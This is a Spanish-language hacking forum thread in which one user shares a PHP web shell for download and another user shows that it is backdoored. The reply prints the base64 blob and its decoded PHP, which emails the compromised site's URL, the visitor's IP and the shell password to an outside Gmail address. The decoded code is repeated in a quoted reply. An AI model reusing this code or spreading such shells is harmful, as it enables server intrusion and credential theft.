This site uses cookies own and third. If you continue to browse consider to accept the use of cookies. OK More Info.

Bangladesh Cyber Army Shell (BCA Private Shell)

  • 3 Replies
  • 7388 Views

0 Members and 1 Guest are viewing this topic.

Offline craventhegod

  • *
  • Underc0der
  • Posts: 3
  • Actividad:
    0%
  • Reputación 0
    • View Profile
    • [C]raven [in]seguridad Informatica

Bangladesh Cyber Army Shell (BCA Private Shell)

  • on: June 08, 2013, 04:29:05 pm
buenas tardes, aquí les traigo una shell que espero les guste codeada por Bangladesh Cyber Army :P



 como se ve en la imagen sus funciones son muy directas y automatizadas,




enjoy it :P


solo pegala en un editor de texto plano y guardala como   .php
DESCARGA

You are not allowed to view links. Register or Login
« Last Edit: November 23, 2014, 02:39:11 pm by Expermicid »
todo es relativo, hasta nuestra existencia :) Shalom

Offline StuXn3t

  • *
  • Underc0der
  • Posts: 198
  • Actividad:
    0%
  • Country: 00
  • Reputación 0
  • Twitter: @hackem
    • View Profile
    • Ethical Hacking, Malware Analysis, Disinfection Techniques and more...
Interesante, gracias por compartir!!  :D

Saludos!
You are not allowed to view links. Register or Login

Offline Andro1de

  • *
  • Underc0der
  • Posts: 6
  • Actividad:
    0%
  • Reputación 0
    • View Profile
Aaaa laaaaaa, no había visto una web shell tan descaradamente backdoreada

linea 56:
JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIldTTyAyLjcgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAkYXV0aF9wYXNzIjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgiaGFyZHdhcmVoZWF2ZW4uY29tQGdtYWlsLmNvbSIsJGp1ZHVsLCRib2R5LCRhdXRoX3Bhc3MpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw==

Code: You are not allowed to view links. Register or Login
$visitc = $_COOKIE["visits"];
if ($visitc == "") {
  $visitc  = 0;
  $visitor = $_SERVER["REMOTE_ADDR"];
  $web     = $_SERVER["HTTP_HOST"];
  $inj     = $_SERVER["REQUEST_URI"];
  $target  = rawurldecode($web.$inj);
  $judul   = "WSO 2.7 http://$target by $visitor";
  $body    = "Bug: $target by $visitor - $auth_pass";
  if (!empty($web)) { @mail("[email protected]",$judul,$body,$auth_pass); }
}
else { $visitc++; }
@setcookie("visitz",$visitc);


Y eso que solo revise hasta esa linea. ¿Que habrá mas abajo?


Saludos,

Offline morodog

  • *
  • Ex-Staff
  • *****
  • Posts: 348
  • Actividad:
    0%
  • Reputación 1
  • Twitter: m4r4d4g
    • View Profile
You are not allowed to view links. Register or Login
Aaaa laaaaaa, no había visto una web shell tan descaradamente backdoreada

linea 56:
JHZpc2l0YyA9ICRfQ09PS0lFWyJ2aXNpdHMiXTsNCmlmICgkdmlzaXRjID09ICIiKSB7DQogICR2aXNpdGMgID0gMDsNCiAgJHZpc2l0b3IgPSAkX1NFUlZFUlsiUkVNT1RFX0FERFIiXTsNCiAgJHdlYiAgICAgPSAkX1NFUlZFUlsiSFRUUF9IT1NUIl07DQogICRpbmogICAgID0gJF9TRVJWRVJbIlJFUVVFU1RfVVJJIl07DQogICR0YXJnZXQgID0gcmF3dXJsZGVjb2RlKCR3ZWIuJGluaik7DQogICRqdWR1bCAgID0gIldTTyAyLjcgaHR0cDovLyR0YXJnZXQgYnkgJHZpc2l0b3IiOw0KICAkYm9keSAgICA9ICJCdWc6ICR0YXJnZXQgYnkgJHZpc2l0b3IgLSAkYXV0aF9wYXNzIjsNCiAgaWYgKCFlbXB0eSgkd2ViKSkgeyBAbWFpbCgiaGFyZHdhcmVoZWF2ZW4uY29tQGdtYWlsLmNvbSIsJGp1ZHVsLCRib2R5LCRhdXRoX3Bhc3MpOyB9DQp9DQplbHNlIHsgJHZpc2l0YysrOyB9DQpAc2V0Y29va2llKCJ2aXNpdHoiLCR2aXNpdGMpOw==

Code: You are not allowed to view links. Register or Login
$visitc = $_COOKIE["visits"];
if ($visitc == "") {
  $visitc  = 0;
  $visitor = $_SERVER["REMOTE_ADDR"];
  $web     = $_SERVER["HTTP_HOST"];
  $inj     = $_SERVER["REQUEST_URI"];
  $target  = rawurldecode($web.$inj);
  $judul   = "WSO 2.7 http://$target by $visitor";
  $body    = "Bug: $target by $visitor - $auth_pass";
  if (!empty($web)) { @mail("[email protected]",$judul,$body,$auth_pass); }
}
else { $visitc++; }
@setcookie("visitz",$visitc);


Y eso que solo revise hasta esa linea. ¿Que habrá mas abajo?


Saludos,

Juasss xD no hace falta leer más código xD